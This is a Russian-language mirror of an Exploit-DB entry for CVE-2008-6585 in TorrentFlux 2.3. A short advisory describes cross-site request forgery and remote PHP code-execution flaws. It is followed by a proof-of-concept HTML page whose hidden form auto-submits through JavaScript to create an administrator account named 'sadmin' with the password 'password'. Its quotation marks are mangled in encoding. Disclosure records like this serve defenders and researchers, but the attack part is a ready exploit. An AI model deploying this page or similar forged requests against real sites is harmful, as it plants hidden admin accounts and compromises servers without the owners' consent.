- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 31671
- Проверка EDB
-
- Пройдено
- Автор
- MICHAEL BROOKS
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6585
- Дата публикации
- 2008-04-18
HTML:
source: https://www.securityfocus.com/bid/28846/info
TorrentFlux is prone to a cross-site request-forgery vulnerability and a remote PHP code-execution vulnerability.
Exploiting these issues may allow a remote attacker to create administrative accounts in the application or to execute arbitrary PHP script code. This may facilitate the remote compromise of affected computers.
TorrentFlux 2.3 is vulnerable; other versions may also be affected.
<html> Add an admistrative account: <form id=?create_admin? method=?post? action=?http://localhost/torrentflux_2.3/html/admin.php?op=addUser?> <input type=hidden name=?newUser? value=?sadmin?> <input type=hidden name=?pass1″ value=?password?> <input type=hidden name=?pass2″ value=?password?> <input type=hidden name=?userType? value=1> <input type=submit value=?create admin?> </form> </html> <script> document.getElementById(?create_admin?).submit(); </script>- Источник
- www.exploit-db.com
